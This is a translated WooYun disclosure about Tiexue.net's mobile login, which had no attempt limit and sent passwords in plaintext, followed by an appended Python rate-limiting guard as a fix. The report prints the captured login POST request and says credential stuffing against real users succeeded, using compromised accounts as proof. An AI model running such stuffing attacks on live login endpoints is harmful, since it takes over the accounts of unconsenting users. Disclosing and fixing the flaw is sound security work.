
Vulnerability summary

Defect ID: wooyun-2015-0133048

Title: Tiexue.net mobile login interface is poorly designed and allows credential stuffing against users (successful accounts as proof)

Vendor: 北京铁血科技 (Beijing Tiexue Technology)

Author: 路人甲

Submitted: 2015-08-10 14:15

Fixed: 2015-09-24 17:36

Disclosed: 2015-09-24 17:36

Vulnerability type: design flaw / logic error

Severity: Low

Self-assessed rank: 3

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-08-10: details sent to the vendor, awaiting vendor handling
2015-08-10: vendor confirmed; details disclosed to the vendor only
2015-08-20: details disclosed to core white hats and domain experts
2015-08-30: details disclosed to regular white hats
2015-09-09: details disclosed to intern white hats
2015-09-24: details disclosed to the public

Brief description:

Tiexue.net mobile login interface is poorly designed and allows credential stuffing against users (successful accounts as proof)

Detailed description:

http://m.tiexue.net/touch/Login.aspx is Tiexue.net's mobile login interface; the login form applies no limit on login attempts.

[screenshot: 1.png]

The captured POST request is as follows:

POST /touch/loginMessage.aspx HTTP/1.1
Host: m.tiexue.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://m.tiexue.net/touch/Login.aspx
Cookie: bd_close_u1671441=1; ASP.NET_SessionId=qu4tdjavxkmaj2qiwtvbiyrz; Hm_lvt_1c4e211c635223e4b12f4bb75590975a=1439175402; Hm_lpvt_1c4e211c635223e4b12f4bb75590975a=1439186283; cid=JYODNHBL; loginfail=2; _testrefer=sousuo; __utma=247579266.1901801480.1439185862.1439185862.1439185862.1; __utmc=247579266; __utmz=247579266.1439185862.1.1.utmcsr=baidu|utmccn=(organic)|utmcmd=organic; Hm_lvt_c8d128c127cc299c41e73a24f1158b7c=1439175977,1439175980,1439185863; Hm_lpvt_c8d128c127cc299c41e73a24f1158b7c=1439185863; _logck=62A555EB343B579FC522F1B09FD46B6B; BAIDU_DUP_lcr=http://www.baidu.com/link?url=QzWm9pZBGMSJsOyhNEJ2n0tCyT_bKKG-6QvF44Gz1Ty&wd=&eqid=cb7b3ea200019e4e0000000455c83bbe; __utmb=247579266.1.10.1439185862; __utmt=1; __utmv=247579266.|1=loginuser=0=1; Hm_lvt_46453248db73201f248f3cab8fe9b1ce=1439185965; Hm_lpvt_46453248db73201f248f3cab8fe9b1ce=1439186056; checkstatus=%7b%22code%22%3a1%2c%22msg%22%3a%22%e7%ad%be%e5%88%b0%e6%88%90%e5%8a%9f%22%2c%22rank%22%3a4093%2c%22keepdays%22%3a1%7d
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 37
username=aaaaaaaaa&password=aaaaaaaaa


The username and password are both transmitted in plaintext. I then tried credential stuffing against the endpoint and found that it succeeds.

[screenshot: 3.png]

Successful accounts as proof (the username/password list has been omitted here):



Login succeeded~ These are all long-standing users, and with quite a lot of experience points too~

[screenshot: 4.png]

[screenshot: 5.png]

[screenshot: 6.png]

Proof of vulnerability:

(Same content as the detailed description above.)

Suggested fix:

Add a CAPTCHA mechanism.

Copyright notice: reprints must credit the source, 路人甲@乌云
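The report's suggested CAPTCHA and the vendor's eventual server-side attempt limit can be combined in one login guard: a sliding-window counter per client address (credential stuffing shows up as many usernames from one source) that steps up to a CAPTCHA, plus a per-account failure counter that temporarily locks the account. The following is an added illustration in Python, not code from Tiexue.net or WooYun; the LoginGuard class, the thresholds and the demo user store are all assumptions constructed for the example.

```python
import hashlib
import hmac
import os
import time
from collections import defaultdict, deque

# Constructed demo credential store (not the vendor's code): username -> (salt, PBKDF2 hash).
def _pbkdf2(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 50_000)

_SALT = os.urandom(16)
USERS = {"alice": (_SALT, _pbkdf2("correct horse", _SALT))}
_DUMMY_SALT = os.urandom(16)
_DUMMY = (_DUMMY_SALT, _pbkdf2("dummy", _DUMMY_SALT))  # keeps unknown-user timing similar

MAX_ATTEMPTS_PER_IP = 20   # attempts per client in the window before a CAPTCHA is demanded
MAX_FAILS_PER_USER = 5     # failures per account in the window before the account is locked
WINDOW_SECONDS = 600


class LoginGuard:
    """Throttles a login handler per source IP and per account using sliding windows."""

    def __init__(self, now=time.time):
        self.now = now                      # injectable clock so behaviour is testable
        self.ip_attempts = defaultdict(deque)
        self.user_fails = defaultdict(deque)

    def _recent(self, dq, t):
        while dq and dq[0] <= t - WINDOW_SECONDS:   # drop events outside the window
            dq.popleft()
        return len(dq)

    def login(self, ip, username, password, captcha_ok=False):
        t = self.now()
        # Many attempts from one client (stuffing: many usernames, one source) -> require CAPTCHA.
        if self._recent(self.ip_attempts[ip], t) >= MAX_ATTEMPTS_PER_IP and not captcha_ok:
            return "captcha_required"
        self.ip_attempts[ip].append(t)
        # Repeated failures on one account -> temporary lock, even if the password is now right.
        if self._recent(self.user_fails[username], t) >= MAX_FAILS_PER_USER:
            return "locked"
        salt, stored = USERS.get(username, _DUMMY)
        ok = username in USERS and hmac.compare_digest(_pbkdf2(password, salt), stored)
        if ok:
            self.user_fails[username].clear()
            return "ok"
        self.user_fails[username].append(t)
        return "failed"    # identical reply for unknown user and wrong password
```

The guard still needs TLS in front of it, since the captured request shows the credentials travelling in plaintext, and the counters would live in shared storage rather than process memory on a real multi-server deployment.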


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 15

Confirmed at: 2015-08-10 17:35

Vendor reply:

Already fixed; since user passwords are involved, could we ask that this not be made public?

Latest status:

2015-09-21: added a server-side limit on login attempts